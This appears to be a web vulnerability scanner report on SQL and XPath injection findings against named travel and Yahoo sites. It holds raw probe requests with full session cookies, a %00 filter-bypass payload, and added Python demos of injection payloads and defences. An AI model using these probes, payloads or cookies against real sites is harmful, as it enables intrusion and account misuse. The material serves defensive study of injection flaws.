SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application. Note that placeholders can only carry data values: table and column names, sort directions and similar structural elements cannot be parameterised and must instead be validated against a fixed allowlist.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
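The following Python script is an added example written for this page, not code from any of the scanned applications. Against an in-memory SQLite table with constructed rows (the table, column and owner values are invented), it reproduces the points above: the single-quote versus doubled-quote probe that produces each "appears to be vulnerable" entry below, the failure of quote doubling in an unquoted numeric context and in a second-order flow, and the parameterised query that is unaffected by all of them.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (invented table and rows, not taken from the scan)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flights (id INTEGER, type TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO flights VALUES (?, ?, ?)",
        [(103754, "click", "public"), (110592, "click", "public"), (1, "admin", "secret")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, type_value: str) -> list:
    """String concatenation: the input becomes part of the SQL text."""
    sql = "SELECT id FROM flights WHERE type = '" + type_value + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def quote_doubling_numeric(conn: sqlite3.Connection, flight_id: str) -> list:
    """The 'double up single quotes' defence applied to an unquoted numeric context."""
    escaped = flight_id.replace("'", "''")
    sql = "SELECT id FROM flights WHERE id = " + escaped + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def second_order(conn: sqlite3.Connection, username: str) -> list:
    """Escaped on the way in, read back raw, then concatenated into a second query."""
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.execute("INSERT INTO users VALUES ('" + username.replace("'", "''") + "')")
    stored = conn.execute("SELECT name FROM users").fetchone()[0]  # doubled quotes are single again
    sql = "SELECT id FROM flights WHERE owner = '" + stored + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def parameterised_lookup(conn: sqlite3.Connection, type_value: str) -> list:
    """Structure first (placeholder), data second: the value can never become SQL."""
    sql = "SELECT id FROM flights WHERE type = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (type_value,))]


def probe(conn: sqlite3.Connection, lookup, value: str) -> str:
    """The scanner's heuristic: does this value produce a database error or not?"""
    try:
        lookup(conn, value)
        return "ok"
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = make_db()
    # ' breaks the query, '' does not: the signature behind each "appears to be vulnerable" entry
    print("click'  ->", probe(db, vulnerable_lookup, "click'"))         # error
    print("click'' ->", probe(db, vulnerable_lookup, "click''"))        # ok
    print("tautology ->", vulnerable_lookup(db, "' OR '1'='1"))         # every row
    print("numeric   ->", quote_doubling_numeric(db, "103754 OR 1=1"))  # every row despite escaping
    print("2nd order ->", second_order(db, "x' OR owner='secret"))      # the 'secret' row
    print("parameterised ->", parameterised_lookup(db, "' OR '1'='1"))  # [] and no error
```

The numeric case needs no quote at all, which is why the doubling defence never fires; the parameterised version returns an empty result for the same payload because the whole string is compared as a literal value.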
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=103754&AdID=141160&TargetID=28779&Values=215&Redirect=http:/ad.redacted.hostname/jump/N553.ae.travelocity/B4838870.9 HTTP/1.1
Host: dm.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 1
HTTP/1.1 500 Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 12 Dec 2010 15:57:43 GMT
Content-length: 305
Content-type: text/html
Cache-control: no-cache
Connection: close
<HTML><HEAD><TITLE>Server Error</TITLE></HEAD> <BODY><H1>Server Error</H1> This server has encountered an internal error which prevents it from fulfilling your request. The most likely cause is a misc ...[SNIP]...
Request 2
GET /event.ng/Type''=click&FlightID=103754&AdID=141160&TargetID=28779&Values=215&Redirect=http:/ad.redacted.hostname/jump/N553.ae.travelocity/B4838870.9 HTTP/1.1
Host: dm.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 2
HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 12 Dec 2010 15:57:43 GMT
Cache-control: no-cache
Cache-control: no-cache
Pragma: max-age=0
Location: http://redacted.host.name/jump/N553.ae.travelocity/B4838870.9
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=110592&AdID=148582&TargetID=29376&Segments=1,9,449,1024,3017,3336,3799,4301,4302,4327,4634,4719,5180,5563,6968,8989,9612,9990,10495,11148,11925,12670,13671,14438,14655,15011,15299,16146,16595,17055,17759,17979,18014,18029,18030,18185,18186,18197,18203,18204,18205,18206,18226,18268,18269,18309,18375,18385,18434,18435,18602,18603,18604,18631,18720,18816,18846,18998,19026,19028,19060,19268,19321,19326,19383,19468,19516,19565,19661,19663,19679,19726,19745&Targets=5907,13594,20600,8706,28089,27283,29374,29225,28461,29401,9683,16355,25704,16323,28342,26923,24316,27129,27750,28390,28785,29521,16183,29255,29376,29402,27058,27072,27094,28353,28783,17979&Values=25,30,51,60,72,80,90,101,110,150,152,206,215,230,261,1244,2176,2218,2285,2297,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2467,3335,4760,4775,4831,6472,6474,6507,6733,8257,8393,8512,8956,9080,9109,9743,9845,9846,9901,11774,12194,12196&RawValues=&Redirect=http:/leisure.travelocity.com/Promotions/0,,TRAVELOCITY|5826|airfare_main|,00.html HTTP/1.1
Host: dm.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 1
HTTP/1.1 500 Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 12 Dec 2010 15:57:31 GMT
Content-length: 305
Content-type: text/html
Cache-control: no-cache
Connection: close
<HTML><HEAD><TITLE>Server Error</TITLE></HEAD> <BODY><H1>Server Error</H1> This server has encountered an internal error which prevents it from fulfilling your request. The most likely cause is a misc ...[SNIP]...
Request 2
GET /event.ng/Type''=click&FlightID=110592&AdID=148582&TargetID=29376&Segments=1,9,449,1024,3017,3336,3799,4301,4302,4327,4634,4719,5180,5563,6968,8989,9612,9990,10495,11148,11925,12670,13671,14438,14655,15011,15299,16146,16595,17055,17759,17979,18014,18029,18030,18185,18186,18197,18203,18204,18205,18206,18226,18268,18269,18309,18375,18385,18434,18435,18602,18603,18604,18631,18720,18816,18846,18998,19026,19028,19060,19268,19321,19326,19383,19468,19516,19565,19661,19663,19679,19726,19745&Targets=5907,13594,20600,8706,28089,27283,29374,29225,28461,29401,9683,16355,25704,16323,28342,26923,24316,27129,27750,28390,28785,29521,16183,29255,29376,29402,27058,27072,27094,28353,28783,17979&Values=25,30,51,60,72,80,90,101,110,150,152,206,215,230,261,1244,2176,2218,2285,2297,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2467,3335,4760,4775,4831,6472,6474,6507,6733,8257,8393,8512,8956,9080,9109,9743,9845,9846,9901,11774,12194,12196&RawValues=&Redirect=http:/leisure.travelocity.com/Promotions/0,,TRAVELOCITY|5826|airfare_main|,00.html HTTP/1.1
Host: dm.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 2
HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 12 Dec 2010 15:57:32 GMT
Cache-control: no-cache
Cache-control: no-cache
Pragma: max-age=0
Location: http://leisure.travelocity.com/Promotions/0,,TRAVELOCITY|5826|airfare_main|,00.html
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=110720&AdID=148764&TargetID=29404&Segments=1,9,449,1024,3017,3336,3799,4300,4303,4327,4634,4719,5180,5563,5905,6968,9612,9990,10495,11148,12670,13671,14438,14655,15011,15299,15436,16146,16594,17055,17759,17980,18014,18029,18030,18185,18186,18197,18203,18204,18205,18206,18226,18268,18269,18309,18375,18385,18434,18435,18602,18603,18604,18631,18720,18816,18846,18998,19026,19028,19060,19268,19321,19326,19383,19468,19516,19565,19661,19663,19679,19726,19745&Targets=5907,11483,12181,8427,28407,20599,22942,27282,28088,28462,29226,29373,29398,8852,23240,28340,25289,24319,27130,27753,28391,28864,29438,28321,27097,25728,8956,27422,27937,28310,28354,28125,29404,23166,28780&Values=25,30,51,60,72,80,90,101,110,150,152,194,206,215,230,261,1244,2176,2218,2285,2297,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2467,3335,4760,4775,4831,6472,6474,6507,8257,8393,8512,8956,9080,9109,9743,9845,9846,9901,11774,12194,12196&RawValues=&Redirect=http:/leisure.travelocity.com/Promotions/0,,TRAVELOCITY|6449|cars_main,00.html HTTP/1.1
Host: dm.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 1
HTTP/1.1 500 Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 12 Dec 2010 15:57:47 GMT
Content-length: 305
Content-type: text/html
Cache-control: no-cache
Connection: close
<HTML><HEAD><TITLE>Server Error</TITLE></HEAD> <BODY><H1>Server Error</H1> This server has encountered an internal error which prevents it from fulfilling your request. The most likely cause is a misc ...[SNIP]...
Request 2
GET /event.ng/Type''=click&FlightID=110720&AdID=148764&TargetID=29404&Segments=1,9,449,1024,3017,3336,3799,4300,4303,4327,4634,4719,5180,5563,5905,6968,9612,9990,10495,11148,12670,13671,14438,14655,15011,15299,15436,16146,16594,17055,17759,17980,18014,18029,18030,18185,18186,18197,18203,18204,18205,18206,18226,18268,18269,18309,18375,18385,18434,18435,18602,18603,18604,18631,18720,18816,18846,18998,19026,19028,19060,19268,19321,19326,19383,19468,19516,19565,19661,19663,19679,19726,19745&Targets=5907,11483,12181,8427,28407,20599,22942,27282,28088,28462,29226,29373,29398,8852,23240,28340,25289,24319,27130,27753,28391,28864,29438,28321,27097,25728,8956,27422,27937,28310,28354,28125,29404,23166,28780&Values=25,30,51,60,72,80,90,101,110,150,152,194,206,215,230,261,1244,2176,2218,2285,2297,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2467,3335,4760,4775,4831,6472,6474,6507,8257,8393,8512,8956,9080,9109,9743,9845,9846,9901,11774,12194,12196&RawValues=&Redirect=http:/leisure.travelocity.com/Promotions/0,,TRAVELOCITY|6449|cars_main,00.html HTTP/1.1
Host: dm.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 2
HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 12 Dec 2010 15:57:48 GMT
Cache-control: no-cache
Cache-control: no-cache
Pragma: max-age=0
Location: http://leisure.travelocity.com/Promotions/0,,TRAVELOCITY|6449|cars_main,00.html
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that for this instance only the single-quote request is reproduced below, and its response is an HTTP 404 Not Found page rather than a database error; treat the finding as unconfirmed until the single-quote and doubled-quote comparison has been repeated manually.
Request 1
GET /air/results.jsp' HTTP/1.1
Host: www.hotwire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gsc=010000000000; JSESSIONID=696893C9FABF034B9EE9510BDA894AE3; ev20=sid%3AS174%2Cbid%3AB265188; quoter_buyer=AQ; s_sq=%5B%5BB%5D%5D; SaneID=fHvyMp3BJs27MvPQS2W2t9lSY5dCQRQ51G6B0fpqhwMhkgDYyN2c; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi68RxF2Pr/qCeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLV1ZNZZS2s1N/CXl/JDRrtXRXkbu5w3HPUE/Z5usfy4aGkWk9/jjnclZsu+uQHpMAdpmB6SWs5cD9+3oqUwxdMfV06Gm5M+BeEKcPpXIKw/UwTtNmMtrEQ2+LeyEMY8og4FxT6sdXvYjSZ4Zfgpr/fI+rfTHDFUOWuz/O8F4vY2BGgRZLaNi3EtoIM4XG3Qn+B1w2tSEKlFnShoLKeUH+z+Y2+E+iE3AyLLgcGLVoWjOzcezxsXydDOB6tIjFw5WDk4ULezfvyVXgFjecb81pt1fe9k6loXfwc3lSCDpwQZbNDmpTSBpfMj3pRx4CpBqVR01RcQP9Mg9LwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx7wvWHjlWcoDegtEBzEpTitu89D7RJc9fva4TDrBZ6IAVcsFUp4C9lz8Jbl1Jg6E2l0jXVk076XqX6JDXjlNKVOdBLWSH8NNI/7e89k10O8suZIu8cBOHG0r6I9hNg4pdHfoj2E2Dil0dycEw0tHIOLr6I9hNg4pdHSuO1on7pnLQ2QAQqWQXGpH6I9hNg4pdHfoj2E2Dil0dtBuopR7pIozm8aOIRho2+voj2E2Dil0dCg5lZqxghjXqopy7X+MXZzzhEsuwUnZahIaUhoyAr4H6I9hNg4pdHcAjFx3P14/aaJ0QJw9Qs2UknHXxi6KgoUXco5H15qjnJpdHOV+pPBgteouGgHRKuuD22m12apPBP+b3d8Ua/laDoKxlGdEyToRcgOMhUL7ANKks0QXfM4qvqKuYD2wfdef3HNLHSQ1IZ5+NI4QMM5zSieEL01cBCZFWyOz9SP6X; NSC_qspe-xxx-qfstjtu=ffffffffaf131c3045525d5f4f58455e445a4a422d69; s_cc=true; hwAnalytics=previousPageName=air.results&crossPageVariables=%7B%22eVar34%22%3A%22FLU01-01%2CAPD01-01%2CMED01-03%2CLCP01-01%22%7D; s_vi=[CS]v1|266F7BDE8514A831-4000014F001703F1[CE]; s_nr=1289702421780; s_cpm=%5B%5B%27sid%3AS174%2Cbid%3AB265179%27%2C%271289702410218%27%5D%2C%5B%27sid%3AS174%2Cbid%3AB265188%27%2C%271292168643960%27%5D%5D; auth=true; hotwirePageModuleState=pgoodCode=A&searchTokenId=1;
Response 1
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Sun, 12 Dec 2010 15:52:22 GMT
Content-Length: 25686
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The SaneID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SaneID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) or other filter written in native code, where strings are NUL-terminated: the filter stops scanning at the %00 and never sees the quote that follows it, while the application behind it (here a JSP application, whose runtime treats a NUL byte as an ordinary character) receives the whole value. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
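An added example, not code from the scanned application or from any WAF vendor, that emulates the mechanism in Python: a filter written against C-style NUL-terminated strings stops scanning at the first %00, while a managed-runtime application behind it keeps the whole value. The denylist tokens are an assumption about what such a filter might block, the SaneID value is the one shown in the report, and the example assumes the server URL-decodes cookie values before the filter and the application see them.

```python
from urllib.parse import unquote_to_bytes

BLOCKED_TOKENS = (b"'", b"--", b";")  # assumed denylist, as a naive native-code filter might hold it


def native_style_filter(raw: bytes) -> bool:
    """Emulates a C filter built on strlen()/strstr(): scanning ends at the first NUL byte."""
    visible = raw.split(b"\x00", 1)[0]
    return any(token in visible for token in BLOCKED_TOKENS)  # True means "blocked"


def length_aware_filter(raw: bytes) -> bool:
    """Fixed filter: scans the whole buffer and rejects embedded NULs outright."""
    return b"\x00" in raw or any(token in raw for token in BLOCKED_TOKENS)


def value_seen_by_application(raw: bytes) -> str:
    """A managed runtime (JVM, PHP, .NET) keeps every byte; NUL is just another character."""
    return raw.decode("latin-1")


def quote_reaches_query(encoded_cookie: str, filter_fn) -> bool:
    """Does a single quote survive URL decoding and the filter, i.e. reach the SQL layer?"""
    raw = unquote_to_bytes(encoded_cookie)  # assumption: cookie values are URL-decoded server-side
    if filter_fn(raw):
        return False
    return "'" in value_seen_by_application(raw)


if __name__ == "__main__":
    sane_id = "fHvyMp3BJs27MvPQS2W2t9lSY5dCQRQ51G6B0fpqhwMhkgDYyN2c"  # cookie value from the report
    for payload in (sane_id + "'", sane_id + "%00'"):
        print(payload[-6:],
              "native filter lets quote through:", quote_reaches_query(payload, native_style_filter),
              "| fixed filter:", quote_reaches_query(payload, length_aware_filter))
```

The bare quote is caught by both filters; with %00 in front of it only the length-aware filter catches it, which is exactly the difference the scanner exploited.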
Request 1
GET /car/index.jsp HTTP/1.1
Host: www.hotwire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gsc=010000000000; JSESSIONID=696893C9FABF034B9EE9510BDA894AE3; ev20=sid%3AS174%2Cbid%3AB265188; quoter_buyer=AQ; s_sq=%5B%5BB%5D%5D; SaneID=fHvyMp3BJs27MvPQS2W2t9lSY5dCQRQ51G6B0fpqhwMhkgDYyN2c%00'; hotwireLogin=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; NSC_qspe-xxx-qfstjtu=ffffffffaf131c3045525d5f4f58455e445a4a422d69; s_cc=true; hwAnalytics=previousPageName=air.results&crossPageVariables=%7B%22eVar34%22%3A%22FLU01-01%2CAPD01-01%2CMED01-03%2CLCP01-01%22%7D; s_vi=[CS]v1|266F7BDE8514A831-4000014F001703F1[CE]; s_nr=1289702421780; s_cpm=%5B%5B%27sid%3AS174%2Cbid%3AB265179%27%2C%271289702410218%27%5D%2C%5B%27sid%3AS174%2Cbid%3AB265188%27%2C%271292168643960%27%5D%5D; auth=true; hotwirePageModuleState=pgoodCode=A&searchTokenId=1;
Response 1
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Sun, 12 Dec 2010 15:52:14 GMT
Content-Length: 104666
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The hotwireLogin cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hotwireLogin cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /hotel/search-options.jsp HTTP/1.1
Host: www.hotwire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gsc=010000000000; JSESSIONID=696893C9FABF034B9EE9510BDA894AE3; ev20=sid%3AS174%2Cbid%3AB265188; quoter_buyer=AQ; s_sq=%5B%5BB%5D%5D; SaneID=fHvyMp3BJs27MvPQS2W2t9lSY5dCQRQ51G6B0fpqhwMhkgDYyN2c; hotwireLogin=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'; NSC_qspe-xxx-qfstjtu=ffffffffaf131c3045525d5f4f58455e445a4a422d69; s_cc=true; hwAnalytics=previousPageName=air.results&crossPageVariables=%7B%22eVar34%22%3A%22FLU01-01%2CAPD01-01%2CMED01-03%2CLCP01-01%22%7D; s_vi=[CS]v1|266F7BDE8514A831-4000014F001703F1[CE]; s_nr=1289702421780; s_cpm=%5B%5B%27sid%3AS174%2Cbid%3AB265179%27%2C%271289702410218%27%5D%2C%5B%27sid%3AS174%2Cbid%3AB265188%27%2C%271292168643960%27%5D%5D; auth=true; hotwirePageModuleState=pgoodCode=A&searchTokenId=1;
Response 1
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 12 Dec 2010 15:52:15 GMT
Content-Length: 49798
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the captured response below is an ordinary 200 page whose only XPath-related content is the word "useXPath" in a forum link title, so the match is most likely a keyword false positive; treat this instance as unconfirmed.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected. Unlike SQL, XPath 1.0 offers no parameterised query mechanism, so validation (or an engine-specific variable-binding API, where one exists) is the only defence.
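An added example, written for this page and not taken from any scanned application, showing the allowlist check described above beside the concatenation it replaces. The XML document and the user/role attributes are constructed for the demonstration. It uses the standard library's ElementTree, whose restricted XPath rejects the altered predicate with a SyntaxError; a full XPath 1.0 engine would instead evaluate the injected "or" and return the admin entry.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample document standing in for whatever XML store the scanner suspected.
USERS_XML = """<users>
  <user name="alice" role="user"/>
  <user name="admin" role="admin"/>
</users>"""
ROOT = ET.fromstring(USERS_XML)

XPATH_METACHARS = set("\"'/@=*[]()")        # the characters listed in the remediation text
ALLOWED = re.compile(r"[A-Za-z0-9]{1,32}")   # short alphanumeric strings only


def validate(value: str) -> bool:
    """Allowlist check: accept only short alphanumeric strings."""
    return ALLOWED.fullmatch(value) is not None


def metachars_in(value: str) -> set:
    """Which XPath metacharacters a value contains (useful for the rejection message)."""
    return {c for c in value if c in XPATH_METACHARS}


def role_unsafe(name: str) -> str:
    """Input concatenated into the predicate: a quote changes the query structure.

    ElementTree raises SyntaxError on the altered predicate; a full XPath engine
    would evaluate the injected condition instead.
    """
    hits = ROOT.findall(f".//user[@name='{name}']")
    return hits[0].get("role") if hits else "none"


def role_validated(name: str) -> str:
    """Same query, but the input is validated before it goes anywhere near the query."""
    if not validate(name):
        raise ValueError(f"rejected input; contains {sorted(metachars_in(name))}")
    return role_unsafe(name)


def role_compared_in_code(name: str) -> str:
    """Alternative that builds no query from input at all: compare attribute values in code."""
    for user in ROOT.iter("user"):
        if user.get("name") == name:
            return user.get("role")
    return "none"


if __name__ == "__main__":
    payload = "x' or @name='admin"
    print(role_unsafe("alice"))                       # user
    print(metachars_in(payload))                      # {"'", '@', '='}
    try:
        role_validated(payload)
    except ValueError as exc:
        print(exc)
    print(role_compared_in_code(payload))             # none
```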
Request
GET /yui%00'/license.html HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 15:57:34 GMT
Set-Cookie: B=608mk6t6g9s7e&b=3&s=lm; expires=Tue, 12-Dec-2012 20:00:00 GMT; path=/; domain=.yahoo.com
